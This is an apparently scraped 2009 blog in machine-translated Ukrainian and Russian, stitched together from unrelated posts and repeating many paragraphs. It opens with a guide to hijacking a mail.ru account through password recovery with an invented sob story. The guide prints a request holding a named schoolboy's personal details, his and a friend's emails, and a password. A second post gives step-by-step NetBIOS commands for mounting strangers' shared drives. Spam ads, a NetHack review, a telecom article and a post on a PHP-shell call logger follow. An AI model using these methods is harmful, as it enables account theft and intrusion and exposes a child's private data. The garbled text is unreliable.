Введення в СІ.
------------------------
Зміст:
1. СІ, коротко про все.
2. Психологія людини.
3. Методи одержання інформації.
4. Післямова.
-------------------------------------------------- ------------
------------------- СІ, коротко про все -----------------
-------------------------------------------------- ------------
Дорогі початківці хакери (і не початківці теж), я радий представити Вам свою статтю Соціальної Інженерії.
Що таке Соціальна Інженерія? В Інтернеті є багато описів сему слову, але
тільки хакер може зрозуміти це.
Перш за все СІ - вплив на людину психологічно, будь то простий самотня людина, просунутий юзер, нещадні оператори і адміни великих Інтернет-ресурсів. УСІ ВОНИ ЗАЛИШАЮТЬСЯ ЛЮДЬМИ! А це значить що всі вони уразливі до психологічного впливу.
Тобі, дорогий мій соратник, не треба копати літературу типу "Як загіпнотизувати людини через інтернет", "Як маніпулювати людьми" і т.п. СІ є така собі "Імпровізація ляльковода", при тому об'єкт не помічає ніякого маніпулятора над собою, він думає що він управляє собою і здійснює всі свої дії, аж ні!
Загалом, дорогий хакер, знаючи що об'єкт атаки - людина, знай, ти - маніпулятор і ляльковод.
-------------------------------------------------- ------------
------------------ Психологія людини ----------------
-------------------------------------------------- ------------
Якщо ти думаєш, що ти ляльковод і можеш робити з об'єктом як хочеш, то ти не прав. Маніпулювання не містить у собі грубе поводження. Воно може бути у наступному вигляді:
-Жаль
-Доброта
-Співчуття
-Обман
Кожен використовує це по-різному.
Пробачте за маленький розділ)
-------------------------------------------------- ------------
----------- Методи одержання інформації ----------
-------------------------------------------------- ------------
Отже, існують наступні методи:
-Підміна
-Почуття (див. Психологія людини)
-Соц. мережі
Розглянемо все на прикладі:
Об'єкт атаки - мій соратник "хакер" (хай вибачать мене всі хакери планети)
e-mail: trixls@rambler.ru
Чому мило? та тому що на цьому варто Контакт, Однокласники, і т.п.
Крок первий.Обдумиваем "наліт"
Для злому мила я використовую сервіс повернення паролів. Це спеціальний сервіс на mail.ru, де вказуєш докладно свої дані і якщо вони співпадають то тобі на іншу поштову скриньку надсилають новий пароль.
Створюємо липовий ящик типу "trixls@rambler.ru"
Отже, збором відомостей займемося ми з "Контакту" і "Мого Світу". І не забудьте зібрати інфу про друзів, які у нього в "Моєму світі"!
Крок другий. "Наліт"
Адреса http://win.mail.ru/cgi-bin/passremind?action=sendrequest&Username=default&Domain=mail.ru
Отже, заповнюємо всі дані, у місцях "пароль" і "секретне питання" пишемо зламали ((( "або" вкрали хакери! "
Поля з датами. Окрема тема. Коротше дату останнього заходу пишемо на цей день, а народження їсть ь в "МІЙ СВІТ" знову-ж)))
Де треба заповнити поле в самому низу "доп. Інфо", пишемо сумну історію, про те, як злі батьки заборонили вхід на всі, крім шановного й улюбленого мейл.ру і дівчина сидить тільки в агента і все ... Ну короче розписуємо багато за все, говоримо про друзів, які на "Мій світ" і т.п. вказуємо потрібні дані в цьому полі теж)
Пишемо другому адресу (імя_об'екта@другой_сервіс.ру)
Відправляємо
Крок третій. Отримання пароля
Отже, нам має прийти на липовий ящик наступне:
--- Здравствуйте.
Пароль до п / я trixls@mail.ru: bo4s8fsw (пароль я вже поміняв)))
Ми рекомендуємо Вам встановити новий пароль (http://www.mail.ru/pages/help).
Також рекомендуємо Вам змінити таємне запитання і відповідь на нього (http://www.mail.ru/pages/help/2.html #).
З повагою,
Служба підтримки користувачів
поштової системи Mail.ru
Якщо Вам прийшов "Недостатньо відомостей - користуєтеся моїм методом, а саме:
Зрозумійте мене правильно, прошу! Мій ящик зламали і поміняли відповідь на таємне
питання, тому я нічого не можу вказати! Ви ж теж люди! Це
максимум з усього того, що я знаю, решта поміняли!
І тоді-то Вам точно прийде пароль, перевірено на 10 людей. Результат 10 з 10!
-------------------------------------------------- ------------
--------------------- Післямова -------------------------
-------------------------------------------------- ------------
Отже, даний метод перевірений мною і написаний не тільки в ознайомлювальних цілях;)
Ось Вам листа для ознайомлювальних цілей:
--------------------
--------------------
Здравствуйте.
У вашому запиті на пароль до поштової скриньки trixls@mail.ru Ви повідомили наступні дані:
Ім'я: Олег
Прізвище: Салтиков
Cекретний питання:???
Відповідь на секретне питання: Поміняли
Пол: М
Вік:
Регіон: Росія
Місто: Солнечногорск
Дата реєстрації: 15-6-2008
Коментарі: trixls@mail.ru
Востаннє я змінював пароль вчора, а саме 30.08.09, але в мене однокласник займається зломом і я думаю це він зробив!
При реєстрації у мене був простий пароль, але його я не пам'ятаю, а відповідь на таємне запитання при реєстрації був "Топільська", це прізвище моєї матері, чого я не забуду.
Це мою поштову скриньку, у друзях у мене моя дівчина, Дарина Сучкова, 8142_94@mail.ru, один Едвін, він вболіває за спартак і челсі, сестра, ще один і Олена Третьякова! Едвін фанат Лемпарда як і я)
Програмують на Pascal, вчуся на 4 і 5, з першого вересня 09 года піду в 8-ий клас.
ВКонтакте.ру я видалив цю сторінку, про всяк випадок, не хочу, чтою зламали!
Сподіваюся Ви повірите мені, адже я зараз далеко від своєї дівчини, а батьки через покарання відкрили мені доступ тільки в mail.ru і blogs.mail.ru ...
Спасибо за ваш увагу, з повагою і надією на адміністрацію Олег Салтиков!
Для видачі пароля цих даних недостатньо.
За наданими Вами даними ми не можемо вислати Вам пароль.
Можливо, у Вашому запиті невірно вказано ім'я поштової скриньки або домен (mail.ru, inbox.ru, list.ru або bk.ru)
Якщо даний п / я був зареєстрований не Вами особисто - зверніться за цією інформацією до реєструвати його особі.
Для відновлення пароля, вкажіть, будь ласка, всю інформацію, введену при реєстрації:
- Ім'я а / с;
- Таємне запитання;
- Відповідь на нього;
- Місто;
- ПІБ.
Будь ласка, пригадайте:
- Приблизну дату реєстрації даного а / с;
- Який електронна адреса була вказана при його реєстрації;
- На яку адресу коштує в ньому пересилання (якщо така є);
- Які адреси можуть перебувати в адресній книзі в цьому а / с;
- Які папки крім стандартних створені в ньому;
- З яких IP-адрес зазвичай здійснювалися заходи в цей а / с;
- Приблизну комбінацію символів в паролі;
- Будь-яку іншу інформацію, що підтверджує Ваші права на цей а / с.
Цю інформацію введіть у формі для відновлення пароля
http://mail.ru/cgi-bin/passremind?action=sendrequest&Username=trixls&Domain=mail.ru
З повагою,
Служба підтримки користувачів
поштової системи Mail.ru
середа, 7 жовтня 2009 р.
Злому (будемо порушувати закон) [Хакерство для новачків]
Всем привет! Я пишу свою першу статтю на хакзоне, сподіваюся вона комунібуть стане в нагоді)) думаю з назви статті ви вже зрозуміли що за цей злом йде кримінальна відповідальність, і найгірше що ви навіть не знаєте на чий ПК ви потрапили, отже можете качати навіть секретні дані СБУ , і т.д. Але у цього злому є і свої плюси: вам не знадобиться майже ніякого софта. Весь софтвер надала нам кватирка, але все-таки одну прогу скачати вам знадобиться. Заходимо на сайт http / / www.xakep.ru і в рядку "пошук" пишемо "xSHaReZ" (без ковичек!!). З усього знайденого клікаємо по самій верхній, знаходимо сканер і качаємо. Для того, щоб злом пройшов успішно нам потрібно встановити клієнт мереж Майкрософт і протокол "NetBIOS". Це ви повинні вміти і самі. Сканер проводить сканування портів ваших жертв. Після загляньте в розділ "логи" і якщо ви побачите приблизно таке:
IP адреса 62.171.274.1
Назва компа: VASYA
Ім `я користувача за компом: MAKAROV
Робоча група: VASYA
то у вас є шанс. Тепер заходимо в Пусквиполнть і набираємо:
"nbtstat.exe - A ip.ad.re.ss" ip.ad.re.ss - той що видав сканер (у нас це 62.171.274.1) після кліка по вводу вікно доса видасть вам щось таке:
VASYA <00> UNIQUE
VASYA <15> UNIQUE
SERVER <00> GROUP
SERVER <1C> GROUP
SERVER <1E> GROUP
VASYA <05> UNIQUE
MAC Adress = 00-00-00-00-00-00
Тепер будемо шукати на кватирці файл "Imhosts". Відкриваємо пошук і шукаємо. Спочатку він порожній. Пишемо в нього "ip.ad.re.ss VASYA # pre". Зберігаємо. Знову йдемо в виконати і друкуємо: "netview VASYA". Якщо вам пощастило і ви побачите таке:
Share name Type
---------------------------------
MyDisk Disk
Obshiye Disk
Команда виконана успішна
Злом вдався. Якщо ж ні, то спробуйте все заново, а краще з іншим ПК. Але якщо вам пощастило і все пройшло успішно заходимо в виконати і пишемо:
"net use x: VASYAMyDisk". Все, його ПК ваш. Йдемо в "мій комп'ютер", у ньому з'явився новий диск "Х")).
IP адреса 62.171.274.1
Назва компа: VASYA
Ім `я користувача за компом: MAKAROV
Робоча група: VASYA
то у вас є шанс. Тепер заходимо в Пусквиполнть і набираємо:
"nbtstat.exe - A ip.ad.re.ss" ip.ad.re.ss - той що видав сканер (у нас це 62.171.274.1) після кліка по вводу вікно доса видасть вам щось таке:
VASYA <00> UNIQUE
VASYA <15> UNIQUE
SERVER <00> GROUP
SERVER <1C> GROUP
SERVER <1E> GROUP
VASYA <05> UNIQUE
MAC Adress = 00-00-00-00-00-00
Тепер будемо шукати на кватирці файл "Imhosts". Відкриваємо пошук і шукаємо. Спочатку він порожній. Пишемо в нього "ip.ad.re.ss VASYA # pre". Зберігаємо. Знову йдемо в виконати і друкуємо: "netview VASYA". Якщо вам пощастило і ви побачите таке:
Share name Type
---------------------------------
MyDisk Disk
Obshiye Disk
Команда виконана успішна
Злом вдався. Якщо ж ні, то спробуйте все заново, а краще з іншим ПК. Але якщо вам пощастило і все пройшло успішно заходимо в виконати і пишемо:
"net use x: VASYAMyDisk". Все, його ПК ваш. Йдемо в "мій комп'ютер", у ньому з'явився новий диск "Х")).
Нарыл вот интересную штуку...
Нашел сайт, база актеров ... На нем проводиться кастинг для участия в съемках :
Фильмов, рекламы, и прочего ...Вы можете спокойно в етом поучаствовать .
кастинги киев
Фильмов, рекламы, и прочего ...Вы можете спокойно в етом поучаствовать .
кастинги киев
Домик =)
Представ те как хорашо бы было , купить недвижимость в Испании или Франции.
Особенно если етот домик на берегу побережья...
недвижимость в Испании
Особенно если етот домик на берегу побережья...
недвижимость в Испании
Ночь на пролет .
Совсем недавно собрались с друзьями поиграть в покер ... У меня на дому собрались , купили в карты сидели играли но в скором времени нам ето очень надоело так как играли в дурака... Ктото из друзей предложил поиграть в покер ... Но мысль сразу была откинута так как ... Правил мы не знали .... Ну вот ... я нарыл правила игры в покер .
Дак мы потом сидели играли до 6-ти часов утра =) вот .
правила игры в покер для новичков
Дак мы потом сидели играли до 6-ти часов утра =) вот .
правила игры в покер для новичков
неділя, 4 жовтня 2009 р.
RuClicks.com – биржа трафика – это отличная возможность заработать и привлечь посетителей на свой сайт.
Как биржа трафика RuClicks.com может помочь раскрутить свой сайт? Очень просто – здесь вы можете легко и быстро купить трафик по цене от 3 долларов за 1000 уникальных посетителей! Биржа предлагает посетителей из разных категорий, а так же по геотаргетингу. Вы можете купить посетителей даже из своего города.
Как заработать с RuClicks.com? Допустим, у меня есть сайт и я хочу заработать. Что я могу сделать:
1) Я могу добавить на сайт ссылки на продажу трафика. За каждого отправленного посетителя биржа начислит мне деньги, которые я смогу снять в любой момент при достижении минимальной суммы в 20 долларов на счету.
2) Я могу добавить на сайт ссылку на партнерскую программу RuClicks.com и я буду получать 5% от всех покупок, сделанных привлеченными рекламодателями.
На данный момент через биржу RuClicks.com каждый день продается почти миллион русскоязычных посетителей и это один из наиболее динамично развивающихся проектов рунета. Не упустите свою возможность!
Ссылка на сайт: http://www.ruclicks.com/
Как биржа трафика RuClicks.com может помочь раскрутить свой сайт? Очень просто – здесь вы можете легко и быстро купить трафик по цене от 3 долларов за 1000 уникальных посетителей! Биржа предлагает посетителей из разных категорий, а так же по геотаргетингу. Вы можете купить посетителей даже из своего города.
Как заработать с RuClicks.com? Допустим, у меня есть сайт и я хочу заработать. Что я могу сделать:
1) Я могу добавить на сайт ссылки на продажу трафика. За каждого отправленного посетителя биржа начислит мне деньги, которые я смогу снять в любой момент при достижении минимальной суммы в 20 долларов на счету.
2) Я могу добавить на сайт ссылку на партнерскую программу RuClicks.com и я буду получать 5% от всех покупок, сделанных привлеченными рекламодателями.
На данный момент через биржу RuClicks.com каждый день продается почти миллион русскоязычных посетителей и это один из наиболее динамично развивающихся проектов рунета. Не упустите свою возможность!
Ссылка на сайт: http://www.ruclicks.com/
Магазин запчасти - большой ассортимент в наличии, срочный заказ, на сайте используется уникальная поисковая система Price-AZ (искать запчасти можно на любые автомобили). Уникальность поисковой системы заключается в поиске не только по номеру но и по названию автозапчасти. При магазине есть небольшой автосервис...
Недавно с етого сайта заказал несколько запчастей
...
Отличие етой слыжбы в том что вышло на много дишевле чем на других сайтах ..
+ Ремонт вышел дишевле чем на СТО .
Советую обратить внемание на етот сайт если у вас есть машына ...
А вот и моя машынка :
Запчасти
Недавно с етого сайта заказал несколько запчастей
...
Отличие етой слыжбы в том что вышло на много дишевле чем на других сайтах ..
+ Ремонт вышел дишевле чем на СТО .
Советую обратить внемание на етот сайт если у вас есть машына ...
А вот и моя машынка :
Запчасти
середа, 30 вересня 2009 р.
Юридические услуги
Магазин юридических услуг
Юредические услуги любого типа , от магазина юредических услуг.
готовые фирмы 2008
Юредические услуги любого типа , от магазина юредических услуг.
готовые фирмы 2008
середа, 16 вересня 2009 р.
NetHack. Об игре
Многие, уверен, знают эту замечательную игру и убили на нее не одну неделю своей жизни. По моему скромному мнению — это одна из лучших игр из ныне существующих.
Появилась она очень давно — в 1987 году, через семь лет после выхода Roque — прародителя нетхака и основателем жанра "rogue-подобных игр".
Nethack — самый яркий ее представитель.
И что же такого интересного и захватывающего в этой игре? — спросите вы. И я вам отвечу — возможности игры, графика, геймплей, сюжет.
Да-да. Вы не ослышались. Именно это и ценно в этой игре.
Графика
Основная проблема современных игр с современными требованиями — это нарисовать все то, что происходит. Я думаю, поэтому в современных играх нельзя взять чей-то труп и орудовать им, как оружием. Или взять гранатомет и использовать его в качестве дубинки. Или освежевать убитого дракона и натянуть на себя его шкуру.
Как это нарисовать? Как должен себя вести персонаж и окружение в таком случае? Не нарисуют, а если нарисуют, то схематически. Приходиться додумывать :)
В nethack'е эта проблема решена гениально — додумывайте все сами. Впрочем, это общая особенность всех ASCII-art игр.
«Видите, символ процента? Это еда. Она зеленая? Тогда это или труп лепрекона, или водоросли.» Собственно графическим адаптером выступит ваше воображение :)
Через некоторое время вы будете рефлекторно бояться пурпурной «L», ибо для вас это уже страшный монстр Архи-Лич, который проклянет ваш магический рюкзачок (что если не смерть, то жизнь высокой ценой) и практически не обращать внимание на ужей (newt) ползающих у вас под ногами в виде желтеньких двоеточий.
Конечно же есть графические версии этой игры. Даже про 3D слышал. Но это все — только мешает. Попробовать, конечно, стоит. Я, например, попробовал и вернулся назад к любимому ASCII-art.
По просьбам читателей. Графическая версия выглядит вот так:
Кстати, еще есть изометрические графические версии: заброшенная Falcon's Eye и ныне здравствующая Vulture's Eye. (Infernalподсказал)
Сюжет
Сюжет прост до безобразия. Вы, искатель приключений, спускаетесь в глубокое-глубокое подземелье в поисках амулета Йендора. Спустись, возьми, принеси и получи вечную жизнь в подарок. Хеппи энд.
Сюжет не отвлекает от игрового процесса и абсолютно не указывает вам что нужно делать сиюминутно. И это самое главное.
И, в качестве бонуса у вас будет один единственный квест (уникальный для типа персонажа), по окончанию которого получаете замечательный актефакт… Какой? It depends
Одна игра — одна цель. Ничего лишнего.
Геймплей и возможности игры
Мышь в первоначальной версии не участвовала вовсе, ибо не все компьютеры на момент выхода игры были с мышью. Позже, конечно сделали примитивную поддержку мыши, но даже не знаю зачем — она там вовсе не нужна. Все управление осуществляется с помощью клавиатуры, причем практически всей клавиатуры (думаю, не удивил).
В отличие от типичных представителей RPG, эта игра происходит в пошаговом режиме, чем невольно вызывает ассоциацию с шахматами. Что-то произошло — не спешите жать на кнопки. Посмотрите на текущие возможности, поразмышляйте. Совсем туго — сохранитесь и отложите важное решение до завтра (благо уже четыре утра на часах и вы уже часов эдак восемь играете не отрываясь :)
Типичная ситуация: ваш персонаж в трех шагах от смерти. Стоит рядом агрессивно настроеный жирный тролль, который и не собирается умирать. Типичная RPG предлагает на ваш выбор весьма скудный набор действий: дерись до смерти, бутылочка жизни и дерись до смерти или беги со всех ног.
А в нетхаке набор решений ситуации безграничен. Можно, например взять волшебную палку-копалку (wand of dig) и колдонуть под ноги. Провалимся на этаж ниже, зато выживем. Или взять маркер и написать на полу волшебное слово «Elbereth». Ни один монстр не смеет ступить на эту надпись. Или вообще — использовать заклинание полиморфа на монстра и надеятся, что он превратиться в что-то маленькое и жалкое. Или, достать из заначки труп кокатриса и вмазать тролю что есть силы. Кокатрис превращает в камень всех, до кого дотронется (надеюсь, ваш персонаж надел перчатки?). Вместо тролля у вас будет статуя тролля. Живем дальше. Свиток телепортации тоже весьма эффективно спасет вас он немируемой гибели. Телепортируйтесь подальше. Оденьте кольцо невидимости. И ваш персонаж тихонечко уберется зализывать раны. Прочитайте свиток земли (scroll of earth) на тролля свалится огромный валун. Читайте свиток геноцида (scroll of genocide) и уничтожте всех троллей. Помолитесь, наконец своему божеству (alt + p)! Бог услышит ваши молитвы и восстановит вам здоровье на правах чуда. Впечатляет?
Сохраняйтесь почаще
Все эти потуги оправданы, ибо самое мощное заклинание всех времен и народов «save and load» не работает, как и в diablo, например. Только «сохраниться и выйти». И, как в диабло на хардкоре, персонаж может умереть лишь один раз :) Крепко задумайтесь, прежде чем что-либо сделать. Это может оказаться фатальным для вашего персонажа!
Знание английского и переводы
Было сделано куча попыток русифицировать nethack, дабы сделать его более популярным среди русскоязычного населения. Но пара ночей и красные глаза позволят вам свободно ориентироваться в английской версии. Могу только дать совет ставить сразу английскую версию, и переводить все, что непонятно со словарем. Сложности с языком испытываешь первых десять смертей.
Тем, кто все-таки решился на русский нетхак — вот вам ссылка. Русский неполноценный, вперемешку с английским, но все же есть. Но, умоляю! Попробуйте в английскую! :)
Ссылки
На последок — порция ссылок на все случаи жизни.
* Официальный сайт игры
* Нетхако-вики
* Сообщество живого журнала «nethack_ru»
* Русская википедия о нетхаке со своей порцией ссылок
* Английская википедия о нетхаке со своей порцией ссылок
* Спойлеры. (самая полезная ссылка, после того как разобрался с управлением)
Понравилось? Тогда продолжение следует.
Бесславно убит продавцом магазина. Поделом! Не нужно было дверь ногой вышибать :)
Если сообщество оценит — напишу еще что-нибудь.
P.S.В «Игры» бы перенести... Спасибо. Перенес в «Игры»
Появилась она очень давно — в 1987 году, через семь лет после выхода Roque — прародителя нетхака и основателем жанра "rogue-подобных игр".
Nethack — самый яркий ее представитель.
И что же такого интересного и захватывающего в этой игре? — спросите вы. И я вам отвечу — возможности игры, графика, геймплей, сюжет.
Да-да. Вы не ослышались. Именно это и ценно в этой игре.
Графика
Основная проблема современных игр с современными требованиями — это нарисовать все то, что происходит. Я думаю, поэтому в современных играх нельзя взять чей-то труп и орудовать им, как оружием. Или взять гранатомет и использовать его в качестве дубинки. Или освежевать убитого дракона и натянуть на себя его шкуру.
Как это нарисовать? Как должен себя вести персонаж и окружение в таком случае? Не нарисуют, а если нарисуют, то схематически. Приходиться додумывать :)
В nethack'е эта проблема решена гениально — додумывайте все сами. Впрочем, это общая особенность всех ASCII-art игр.
«Видите, символ процента? Это еда. Она зеленая? Тогда это или труп лепрекона, или водоросли.» Собственно графическим адаптером выступит ваше воображение :)
Через некоторое время вы будете рефлекторно бояться пурпурной «L», ибо для вас это уже страшный монстр Архи-Лич, который проклянет ваш магический рюкзачок (что если не смерть, то жизнь высокой ценой) и практически не обращать внимание на ужей (newt) ползающих у вас под ногами в виде желтеньких двоеточий.
Конечно же есть графические версии этой игры. Даже про 3D слышал. Но это все — только мешает. Попробовать, конечно, стоит. Я, например, попробовал и вернулся назад к любимому ASCII-art.
По просьбам читателей. Графическая версия выглядит вот так:
Кстати, еще есть изометрические графические версии: заброшенная Falcon's Eye и ныне здравствующая Vulture's Eye. (Infernalподсказал)
Сюжет
Сюжет прост до безобразия. Вы, искатель приключений, спускаетесь в глубокое-глубокое подземелье в поисках амулета Йендора. Спустись, возьми, принеси и получи вечную жизнь в подарок. Хеппи энд.
Сюжет не отвлекает от игрового процесса и абсолютно не указывает вам что нужно делать сиюминутно. И это самое главное.
И, в качестве бонуса у вас будет один единственный квест (уникальный для типа персонажа), по окончанию которого получаете замечательный актефакт… Какой? It depends
Одна игра — одна цель. Ничего лишнего.
Геймплей и возможности игры
Мышь в первоначальной версии не участвовала вовсе, ибо не все компьютеры на момент выхода игры были с мышью. Позже, конечно сделали примитивную поддержку мыши, но даже не знаю зачем — она там вовсе не нужна. Все управление осуществляется с помощью клавиатуры, причем практически всей клавиатуры (думаю, не удивил).
В отличие от типичных представителей RPG, эта игра происходит в пошаговом режиме, чем невольно вызывает ассоциацию с шахматами. Что-то произошло — не спешите жать на кнопки. Посмотрите на текущие возможности, поразмышляйте. Совсем туго — сохранитесь и отложите важное решение до завтра (благо уже четыре утра на часах и вы уже часов эдак восемь играете не отрываясь :)
Типичная ситуация: ваш персонаж в трех шагах от смерти. Стоит рядом агрессивно настроеный жирный тролль, который и не собирается умирать. Типичная RPG предлагает на ваш выбор весьма скудный набор действий: дерись до смерти, бутылочка жизни и дерись до смерти или беги со всех ног.
А в нетхаке набор решений ситуации безграничен. Можно, например взять волшебную палку-копалку (wand of dig) и колдонуть под ноги. Провалимся на этаж ниже, зато выживем. Или взять маркер и написать на полу волшебное слово «Elbereth». Ни один монстр не смеет ступить на эту надпись. Или вообще — использовать заклинание полиморфа на монстра и надеятся, что он превратиться в что-то маленькое и жалкое. Или, достать из заначки труп кокатриса и вмазать тролю что есть силы. Кокатрис превращает в камень всех, до кого дотронется (надеюсь, ваш персонаж надел перчатки?). Вместо тролля у вас будет статуя тролля. Живем дальше. Свиток телепортации тоже весьма эффективно спасет вас он немируемой гибели. Телепортируйтесь подальше. Оденьте кольцо невидимости. И ваш персонаж тихонечко уберется зализывать раны. Прочитайте свиток земли (scroll of earth) на тролля свалится огромный валун. Читайте свиток геноцида (scroll of genocide) и уничтожте всех троллей. Помолитесь, наконец своему божеству (alt + p)! Бог услышит ваши молитвы и восстановит вам здоровье на правах чуда. Впечатляет?
Сохраняйтесь почаще
Все эти потуги оправданы, ибо самое мощное заклинание всех времен и народов «save and load» не работает, как и в diablo, например. Только «сохраниться и выйти». И, как в диабло на хардкоре, персонаж может умереть лишь один раз :) Крепко задумайтесь, прежде чем что-либо сделать. Это может оказаться фатальным для вашего персонажа!
Знание английского и переводы
Было сделано куча попыток русифицировать nethack, дабы сделать его более популярным среди русскоязычного населения. Но пара ночей и красные глаза позволят вам свободно ориентироваться в английской версии. Могу только дать совет ставить сразу английскую версию, и переводить все, что непонятно со словарем. Сложности с языком испытываешь первых десять смертей.
Тем, кто все-таки решился на русский нетхак — вот вам ссылка. Русский неполноценный, вперемешку с английским, но все же есть. Но, умоляю! Попробуйте в английскую! :)
Ссылки
На последок — порция ссылок на все случаи жизни.
* Официальный сайт игры
* Нетхако-вики
* Сообщество живого журнала «nethack_ru»
* Русская википедия о нетхаке со своей порцией ссылок
* Английская википедия о нетхаке со своей порцией ссылок
* Спойлеры. (самая полезная ссылка, после того как разобрался с управлением)
Понравилось? Тогда продолжение следует.
Бесславно убит продавцом магазина. Поделом! Не нужно было дверь ногой вышибать :)
Если сообщество оценит — напишу еще что-нибудь.
P.S.В «Игры» бы перенести... Спасибо. Перенес в «Игры»
Навіщо Білайну Камаз за 5 мільйонів?
Коли в одній невеликій точці на карті збирається стотисячний натовп, за нею треба око та око, а то накоїв ще чого-небудь - потім клопоту. От і доводиться нашим правоохоронцям, про доблесть яких ходять легенди, приїжджати туди і стежити своїми пильними очима за тим, щоб все було добре. Та й медики не залишаються осторонь: ці чудові люди в білих халатах складають компанію панам в сірій формі на той випадок, якщо комусь раптом стане не дуже добре. Але це тільки вершина айсберга! Насправді, на заходах, подібних до реконструкції Бородінської битви, яка відбулася 6 вересня в ста кілометрах від Москви, працюють тисячі інших людей, які роблять багато різних корисних справ, щоб усім, хто приїхав туди відпочити, було максимально комфортно. У їх рядах можна було зустріти також і двох людей у чорно-жовтих куртках на білому Камаз вартістю п'ять мільйонів рублів.
У стороні від основних гулянь, в чистому полі ці двоє розмістили першу і поки єдину в Росії мобільний базову станцію, що забезпечує в місцях скупчення людей до 200 додаткових каналів голосового зв'язку в один момент часу. Проходив повз люди навряд чи здогадувалися про призначення вантажівки зі зростаючою з нього 17-метрової щоглою, і лише ті, хто курсував зовсім поруч, могли помітити на його бортах емблеми компанії Білайн і сказати глибокодумно: «Ах от чому в мене такий гарний прийом!»
Строго кажучи, згаданих грошей коштує, звичайно, не сам Камаз (для довідки: новенький камаз коштує близько 1 млн. руб), і навіть не здоровенний білий контейнер позаду кабіни, а те, що знаходиться всередині нього: стійки з комунікаційним обладнанням Ericsson і Alcatel , а також антени, що ростуть з даху.
З «похідного» стану в робочий МБС може перейти приблизно за годину: у боку висуваються гідравлічні упори, шасі вирівнюється, далі починається інтеграція привезеного обладнання та існуючої мережі. Вибір способу зв'язку цілком і повністю залежить від умов, в яких опинився високотехнологічний Камаз: автоматика може самостійно навестися і налагодити передачу даних через супутник, через релейну антену або навіть за допомогою лазера. Правда, максимальна відстань, на якому можна ефективно використовувати лазер, - порядку півтора кілометрів.
Природно, для забезпечення безперервного зв'язку на 200 голосових лініях одночасно потрібно досить багато енергії, а тому оператори мобільного базової станції насамперед шукають місцеве джерело електрики. Але навіть якщо його не вдається знайти, вони не журяться довго, тому що на МБС встановлений дизельний генератор, а поруч з ним стоїть 700 літрова каністра з дизельним паливом, та й у баках у Камаза теж не 95-й бензин, так що час автономної роботи такої станції досягає двох тижнів, а то й більше. В цьому випадку мова йде про те, скільки витримає екіпаж: у наявності хоч і є два спальних місця, розраховані вони більше все-таки на нетривалі терміни.
Постає питання, навіщо я вам це розповідаю вдруге, якщо презентація цієї ж самої мобільної базової станції пройшла в минулому році? Справа в тому, що тоді тільки проводилися її випробування, і виходили різні дозволи. А зараз - це вже цілком працездатний зразок, який побував у кількох «гарячих точках».
Чи варто чекати відповіді від інших операторів на введення в експлуатацію першого МБС Білайну, поки сказати складно. МТС ні про що таке не заявляла, а в Мегафоні взагалі вважають подібні розробки безперспективними. Але факт залишається фактом: на минулому святі найбільш мобільними себе відчували абоненти жовто-смугастих, радісно повідомляючи оточуючим про наявність впевненого прийому і про відсутність збоїв в мережі.
У стороні від основних гулянь, в чистому полі ці двоє розмістили першу і поки єдину в Росії мобільний базову станцію, що забезпечує в місцях скупчення людей до 200 додаткових каналів голосового зв'язку в один момент часу. Проходив повз люди навряд чи здогадувалися про призначення вантажівки зі зростаючою з нього 17-метрової щоглою, і лише ті, хто курсував зовсім поруч, могли помітити на його бортах емблеми компанії Білайн і сказати глибокодумно: «Ах от чому в мене такий гарний прийом!»
Строго кажучи, згаданих грошей коштує, звичайно, не сам Камаз (для довідки: новенький камаз коштує близько 1 млн. руб), і навіть не здоровенний білий контейнер позаду кабіни, а те, що знаходиться всередині нього: стійки з комунікаційним обладнанням Ericsson і Alcatel , а також антени, що ростуть з даху.
З «похідного» стану в робочий МБС може перейти приблизно за годину: у боку висуваються гідравлічні упори, шасі вирівнюється, далі починається інтеграція привезеного обладнання та існуючої мережі. Вибір способу зв'язку цілком і повністю залежить від умов, в яких опинився високотехнологічний Камаз: автоматика може самостійно навестися і налагодити передачу даних через супутник, через релейну антену або навіть за допомогою лазера. Правда, максимальна відстань, на якому можна ефективно використовувати лазер, - порядку півтора кілометрів.
Природно, для забезпечення безперервного зв'язку на 200 голосових лініях одночасно потрібно досить багато енергії, а тому оператори мобільного базової станції насамперед шукають місцеве джерело електрики. Але навіть якщо його не вдається знайти, вони не журяться довго, тому що на МБС встановлений дизельний генератор, а поруч з ним стоїть 700 літрова каністра з дизельним паливом, та й у баках у Камаза теж не 95-й бензин, так що час автономної роботи такої станції досягає двох тижнів, а то й більше. В цьому випадку мова йде про те, скільки витримає екіпаж: у наявності хоч і є два спальних місця, розраховані вони більше все-таки на нетривалі терміни.
Постає питання, навіщо я вам це розповідаю вдруге, якщо презентація цієї ж самої мобільної базової станції пройшла в минулому році? Справа в тому, що тоді тільки проводилися її випробування, і виходили різні дозволи. А зараз - це вже цілком працездатний зразок, який побував у кількох «гарячих точках».
Чи варто чекати відповіді від інших операторів на введення в експлуатацію першого МБС Білайну, поки сказати складно. МТС ні про що таке не заявляла, а в Мегафоні взагалі вважають подібні розробки безперспективними. Але факт залишається фактом: на минулому святі найбільш мобільними себе відчували абоненти жовто-смугастих, радісно повідомляючи оточуючим про наявність впевненого прийому і про відсутність збоїв в мережі.
Вахтер: на сторожі системи
«Одного разу, в холодну зимову пору,
Залили на сервер бекдорчіков гору ... »
Народне адмінское творчість
Вобщем як то раз на одному з серверів виявився php-shell, через який злобні хакери зламали затишний дневничок ™ хорошої людини.
Після двогодинного колупання в логах Апача знайшлася діра, через яку залили шелл.
Діру прикрили, дневничок повернули до життя з резервних копій, і сіли думу думати.
Після третьої пляшки пива народилася ідея: «А чому б не відловлювати виконання системних викликів з php скриптів?».
Сенс у тому, що більшість php-Шелл так чи інакше використовують функції exec ();, system ();, shell_exec (); або passthru ();. Відповідно до виконання цих функцій можна перехопити і тихенько в лог записати, що такого-то числа такий-то скрипт на такий-то рядку викликав функцію exec () з параметром «rm-rf /».
Сказано-зроблено. Доброму людині kastigar було поставлено тех. завдання і робота закипіла.
Вже як він расковирівал тонкощі Zend Engine я розповідати не буду, але врешті-решт народилося розширення для PHP4/PHP5 під кодовим ім'ям BAXTEP.
Спочатку ми не планували викладати код в загальний доступ, бо писалося все загалом і в цілому «для себе» і «від і до» не тестувалося, але дух open source все-таки взяв своє - і исходники були викладені на GoogleCode.
Залили на сервер бекдорчіков гору ... »
Народне адмінское творчість
Вобщем як то раз на одному з серверів виявився php-shell, через який злобні хакери зламали затишний дневничок ™ хорошої людини.
Після двогодинного колупання в логах Апача знайшлася діра, через яку залили шелл.
Діру прикрили, дневничок повернули до життя з резервних копій, і сіли думу думати.
Після третьої пляшки пива народилася ідея: «А чому б не відловлювати виконання системних викликів з php скриптів?».
